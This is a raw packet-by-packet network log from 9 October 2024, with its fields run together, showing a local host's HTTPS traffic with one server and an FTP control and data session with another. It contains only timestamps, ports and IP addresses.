                                        Oct 9, 2024 10:51:02.000761986 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:02.000827074 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:02.000921965 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:02.001048088 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:02.001070976 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:02.001132011 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:02.001745939 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:02.001877069 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:02.001888037 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:02.002016068 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:02.002075911 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:02.002075911 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:02.002083063 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:02.002120972 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:02.002182961 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:02.025971889 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:04.664238930 CEST4973121192.168.2.45.2.84.236
                                        Oct 9, 2024 10:51:04.672739029 CEST21497315.2.84.236192.168.2.4
                                        Oct 9, 2024 10:51:04.672844887 CEST4973121192.168.2.45.2.84.236
                                        Oct 9, 2024 10:51:05.319823027 CEST21497315.2.84.236192.168.2.4
                                        Oct 9, 2024 10:51:05.324054003 CEST4973121192.168.2.45.2.84.236
                                        Oct 9, 2024 10:51:05.329200029 CEST21497315.2.84.236192.168.2.4
                                        Oct 9, 2024 10:51:05.549638033 CEST21497315.2.84.236192.168.2.4
                                        Oct 9, 2024 10:51:05.556726933 CEST4973121192.168.2.45.2.84.236
                                        Oct 9, 2024 10:51:05.561703920 CEST21497315.2.84.236192.168.2.4
                                        Oct 9, 2024 10:51:05.856355906 CEST21497315.2.84.236192.168.2.4
                                        Oct 9, 2024 10:51:05.856547117 CEST4973121192.168.2.45.2.84.236
                                        Oct 9, 2024 10:51:05.861490011 CEST21497315.2.84.236192.168.2.4
                                        Oct 9, 2024 10:51:06.081975937 CEST21497315.2.84.236192.168.2.4
                                        Oct 9, 2024 10:51:06.082195997 CEST4973121192.168.2.45.2.84.236
                                        Oct 9, 2024 10:51:06.087410927 CEST21497315.2.84.236192.168.2.4
                                        Oct 9, 2024 10:51:06.307672024 CEST21497315.2.84.236192.168.2.4
                                        Oct 9, 2024 10:51:06.307852030 CEST4973121192.168.2.45.2.84.236
                                        Oct 9, 2024 10:51:06.312880993 CEST21497315.2.84.236192.168.2.4
                                        Oct 9, 2024 10:51:06.533163071 CEST21497315.2.84.236192.168.2.4
                                        Oct 9, 2024 10:51:06.533437967 CEST4973121192.168.2.45.2.84.236
                                        Oct 9, 2024 10:51:06.538796902 CEST21497315.2.84.236192.168.2.4
                                        Oct 9, 2024 10:51:06.758912086 CEST21497315.2.84.236192.168.2.4
                                        Oct 9, 2024 10:51:06.759753942 CEST4973254172192.168.2.45.2.84.236
                                        Oct 9, 2024 10:51:06.765026093 CEST54172497325.2.84.236192.168.2.4
                                        Oct 9, 2024 10:51:06.765120029 CEST4973254172192.168.2.45.2.84.236
                                        Oct 9, 2024 10:51:06.765173912 CEST4973121192.168.2.45.2.84.236
                                        Oct 9, 2024 10:51:06.770673990 CEST21497315.2.84.236192.168.2.4
                                        Oct 9, 2024 10:51:07.397644043 CEST21497315.2.84.236192.168.2.4
                                        Oct 9, 2024 10:51:07.397881031 CEST4973254172192.168.2.45.2.84.236
                                        Oct 9, 2024 10:51:07.397964001 CEST4973254172192.168.2.45.2.84.236
                                        Oct 9, 2024 10:51:07.403098106 CEST54172497325.2.84.236192.168.2.4
                                        Oct 9, 2024 10:51:07.403985023 CEST54172497325.2.84.236192.168.2.4
                                        Oct 9, 2024 10:51:07.404047012 CEST4973254172192.168.2.45.2.84.236
                                        Oct 9, 2024 10:51:07.441575050 CEST4973121192.168.2.45.2.84.236
                                        Oct 9, 2024 10:51:07.624701977 CEST21497315.2.84.236192.168.2.4
                                        Oct 9, 2024 10:51:07.675975084 CEST4973121192.168.2.45.2.84.236
                                        Oct 9, 2024 10:51:15.628856897 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:15.628941059 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:15.629034042 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:15.636913061 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:15.636964083 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:16.645559072 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:16.645669937 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:16.648689985 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:16.648715019 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:16.648960114 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:16.691690922 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:16.709661961 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:16.751419067 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:17.205180883 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:17.205219030 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:17.205225945 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:17.205293894 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:17.205328941 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:17.254115105 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:17.438308954 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:17.438342094 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:17.438491106 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:17.438491106 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:17.438556910 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:17.438577890 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:17.438613892 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:17.438630104 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:17.438766003 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:17.438786983 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:17.438832045 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:17.438843012 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:17.440284967 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:17.440304995 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:17.440347910 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:17.440366030 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:17.670418978 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:17.670439959 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:17.670561075 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:17.670871973 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:17.670933008 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:17.671837091 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:17.671905994 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:17.672283888 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:17.672353983 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:17.673099041 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:17.673165083 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:17.673319101 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:17.673378944 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:17.674181938 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:17.674251080 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:17.710906982 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:17.711019039 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:17.903367996 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:17.903459072 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:17.903561115 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:17.903637886 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:17.903675079 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:17.903745890 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:17.904568911 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:17.904630899 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:17.904858112 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:17.904918909 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:17.905500889 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:17.905572891 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:17.905745029 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:17.905817032 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:17.908219099 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:17.908308983 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:17.909719944 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:17.909780025 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:17.909789085 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:17.909797907 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:17.909857988 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:17.909945011 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:17.909998894 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:17.910027027 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:17.910062075 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:17.910092115 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:17.910109997 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:17.910155058 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:17.910223961 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:17.910327911 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:17.910342932 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:17.910377026 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:17.910393953 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:17.943918943 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:17.943998098 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:17.990746021 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:17.990840912 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:17.991008997 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:17.991077900 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:18.136501074 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:18.136604071 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:18.136662960 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:18.136734009 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:18.136847973 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:18.136910915 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:18.137281895 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:18.137346983 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:18.137479067 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:18.137538910 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:18.137918949 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:18.137991905 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:18.138128996 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:18.138196945 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:18.138628960 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:18.138709068 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:18.138907909 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:18.138971090 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:18.141798973 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:18.141885042 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:18.142065048 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:18.142129898 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:18.142345905 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:18.142411947 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:18.142636061 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:18.142704964 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:18.142940044 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:18.143016100 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:18.143311024 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:18.143376112 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:18.143522024 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:18.143589020 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:18.223671913 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:18.223738909 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:18.223853111 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:18.223908901 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:18.224220037 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:18.224281073 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:18.224463940 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:18.224523067 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:18.224920034 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:18.224983931 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:18.225357056 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:18.225409985 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:18.225413084 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:18.225423098 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:18.225455999 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:18.225950956 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:18.226007938 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:18.226023912 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:18.226083040 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:18.226696968 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:18.226756096 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:18.226758957 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:18.226767063 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:18.226797104 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:18.226809978 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:18.227430105 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:18.227493048 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:18.227559090 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:18.227607012 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:18.227615118 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:18.227659941 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:18.228343964 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:18.228391886 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:18.228394032 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:18.228399992 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:18.228447914 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:18.506885052 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:18.506897926 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:18.506973982 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:18.507066011 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:18.507122040 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:18.507414103 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:18.507504940 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:18.507762909 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:18.507863998 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:18.508060932 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:18.508116961 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:18.508483887 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:18.508544922 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:18.508672953 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:18.508727074 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:18.509326935 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:18.509385109 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:18.509484053 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:18.509533882 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:18.509656906 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:18.509713888 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:18.510318995 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:18.510376930 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:18.510510921 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:18.510562897 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:18.511096954 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:18.511162043 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:18.511298895 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:18.511419058 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:18.511435986 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:18.511533976 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:18.511888027 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:18.511941910 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:18.642286062 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:18.642405033 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:18.642458916 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:18.642524004 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:18.642740965 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:18.642803907 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:18.643071890 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:18.643130064 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:18.643234968 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:18.643285990 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:18.643707037 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:18.643763065 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:18.644124985 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:18.644171953 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:18.644181967 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:18.644191027 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:18.644218922 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:18.644236088 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:18.644768953 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:18.644828081 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:18.644841909 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:18.644893885 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:18.644895077 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:18.644903898 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:18.644943953 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:18.645633936 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:18.645682096 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:18.645834923 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:18.645883083 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:18.646787882 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:18.646847963 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:18.646853924 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:18.646859884 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:18.646888018 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:18.646903038 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:18.646919966 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:18.646925926 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:18.646953106 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:18.646984100 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:18.901052952 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:18.901071072 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:18.901174068 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:18.901187897 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:18.901247025 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:18.901283979 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:18.901339054 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:18.901787996 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:18.901845932 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:18.901931047 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:18.901984930 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:18.902434111 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:18.902498007 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:18.902587891 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:18.902642012 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:18.903176069 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:18.903230906 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:18.903336048 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:18.903413057 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:18.903481007 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:18.903538942 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:18.904006004 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:18.904062986 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:18.904064894 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:18.904077053 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:18.904110909 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:18.904912949 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:18.904982090 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:18.905034065 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:18.905106068 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:18.905119896 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:18.905128956 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:18.905174017 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:18.905189991 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:18.905834913 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:18.905881882 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:18.905911922 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:18.905916929 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:18.905945063 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:18.905966043 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:18.906358957 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:18.906419039 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:18.979697943 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:18.979799986 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:18.979871988 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:18.979953051 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:18.979981899 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:18.980146885 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:18.980278015 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:18.980338097 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:18.980417013 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:18.980473995 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:18.980846882 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:18.980931044 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:18.981249094 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:18.981308937 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:18.981374979 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:18.981453896 CEST49735443192.168.2.4103.191.208.122
